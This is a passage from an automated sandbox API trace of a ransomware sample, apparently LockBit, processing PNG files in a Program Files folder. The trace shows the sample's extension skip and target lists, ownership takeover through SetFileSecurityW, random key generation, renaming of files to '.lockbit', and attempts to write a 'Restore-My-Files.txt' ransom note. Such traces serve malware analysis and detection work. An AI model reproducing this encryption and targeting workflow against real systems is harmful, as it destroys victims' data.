dwReserved1=0x0, cFileName="button-highlight.png", cAlternateFileName="")) returned 1 [0081.942] lstrcmpiW (lpString1=".", lpString2="button-highlight.png") returned -1 [0081.942] lstrcmpiW (lpString1="..", lpString2="button-highlight.png") returned -1 [0081.942] PathFindExtensionW (pszPath="button-highlight.png") returned=".png" [0081.942] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.942] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.942] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.942] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.942] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.942] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.943] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.943] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.943] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.943] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.943] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.944] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.944] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.944] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.944] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.944] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.944] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.944] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.944] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.944] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.944] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.944] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.944] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.944] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.944] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.944] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.944] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.944] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.944] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.944] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.944] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.944] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="button-highlight.png") returned 1 [0081.945] lstrcmpiW (lpString1="ntldr", lpString2="button-highlight.png") returned 1 [0081.945] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="button-highlight.png") returned 1 [0081.945] lstrcmpiW (lpString1="bootsect.bak", lpString2="button-highlight.png") returned -1 [0081.945] lstrcmpiW (lpString1="autorun.inf", lpString2="button-highlight.png") returned -1 [0081.945] lstrcmpiW (lpString1="thumbs.db", lpString2="button-highlight.png") returned 1 [0081.945] lstrcmpiW (lpString1="iconcache.db", lpString2="button-highlight.png") returned 1 [0081.945] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0081.945] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png") returned=".png" [0081.945] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.945] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.945] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.945] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.945] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.945] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.945] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.945] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.945] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.945] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.945] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.945] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.945] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.946] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.946] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.946] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.946] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.946] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.946] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.946] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.946] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.946] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.946] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.946] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.946] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.946] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.946] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.946] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.946] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png.lockbit") returned 82 [0081.946] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.947] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.947] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.947] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.947] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.948] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.948] RtlFreeAnsiString (AnsiString="\\") [0081.948] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0081.948] malloc (_Size=0x200) returned 0x77d800 [0081.948] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.948] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.948] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.948] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.949] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.949] CloseHandle (hObject=0x3bc) returned 1 [0081.949] free (_Block=0x77d800) [0081.949] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0081.949] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.949] malloc (_Size=0x40068) returned 0x2031ed0 [0081.950] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=2374) returned 1 [0081.951] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0081.951] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.952] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0081.952] ReadFile (in: hFile=0x3bc, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0081.953] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.953] malloc (_Size=0xba) returned 0x77d800 [0081.954] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xba, FileInformationClass=0xa) returned 0x0 [0081.954] free (_Block=0x77d800) [0081.954] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0081.954] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0081.954] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.954] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711e1e3a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711e1e3a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6bbd, dwReserved0=0x0, dwReserved1=0x0, cFileName="button-overlay.png", cAlternateFileName="")) returned 1 [0081.954] lstrcmpiW (lpString1=".", lpString2="button-overlay.png") returned -1 [0081.954] lstrcmpiW (lpString1="..", lpString2="button-overlay.png") returned -1 [0081.955] PathFindExtensionW (pszPath="button-overlay.png") returned=".png" [0081.955] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.955] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.955] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.956] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.956] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.956] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.956] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.956] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.956] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.956] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.956] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.956] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.956] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.956] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.956] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.956] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.956] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.956] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.956] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.956] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.956] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.956] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.956] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.957] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.957] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.957] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.957] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.957] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.957] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.957] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.957] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.957] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.957] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="button-overlay.png") returned 1 [0081.957] lstrcmpiW (lpString1="ntldr", lpString2="button-overlay.png") returned 1 [0081.957] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="button-overlay.png") returned 1 [0081.957] lstrcmpiW (lpString1="bootsect.bak", lpString2="button-overlay.png") returned -1 [0081.957] lstrcmpiW (lpString1="autorun.inf", lpString2="button-overlay.png") returned -1 [0081.957] lstrcmpiW (lpString1="thumbs.db", lpString2="button-overlay.png") returned 1 [0081.957] lstrcmpiW (lpString1="iconcache.db", lpString2="button-overlay.png") returned 1 [0081.957] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0081.957] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png") returned=".png" [0081.957] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.957] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.958] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.958] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.958] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.959] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.959] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.959] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.959] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.959] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.959] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.959] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png.lockbit") returned 80 [0081.959] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-overlay.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.960] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.960] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.960] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.960] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.960] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.960] RtlFreeAnsiString (AnsiString="\\") [0081.960] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0081.961] malloc (_Size=0x200) returned 0x77d800 [0081.961] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.961] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.961] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.961] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.961] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.961] CloseHandle (hObject=0x3b8) returned 1 [0081.962] free (_Block=0x77d800) [0081.962] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-overlay.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0081.962] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.962] malloc (_Size=0x40068) returned 0x3e30078 [0081.963] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3e30090 | out: lpFileSize=0x3e30090*=27581) returned 1 [0081.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700ac, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700ac) returned 0x0 [0081.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700bc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700bc) returned 0x0 [0081.964] ReadFile (in: hFile=0x3b8, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0081.976] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.977] malloc (_Size=0xb6) returned 0x77d800 [0081.977] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb6, FileInformationClass=0xa) returned 0x0 [0081.977] free (_Block=0x77d800) [0081.977] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0081.977] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0081.977] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.977] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71207f97, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71207f97, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb53, dwReserved0=0x0, dwReserved1=0x0, cFileName="Memories_buttonClear.png", cAlternateFileName="")) returned 1 [0081.977] lstrcmpiW (lpString1=".", lpString2="Memories_buttonClear.png") returned -1 [0081.977] lstrcmpiW (lpString1="..", lpString2="Memories_buttonClear.png") returned -1 [0081.978] PathFindExtensionW (pszPath="Memories_buttonClear.png") returned=".png" [0081.978] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.978] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.978] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.978] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.979] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.979] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.979] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.979] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.979] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.979] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.979] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.979] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.979] lstrcmpiW 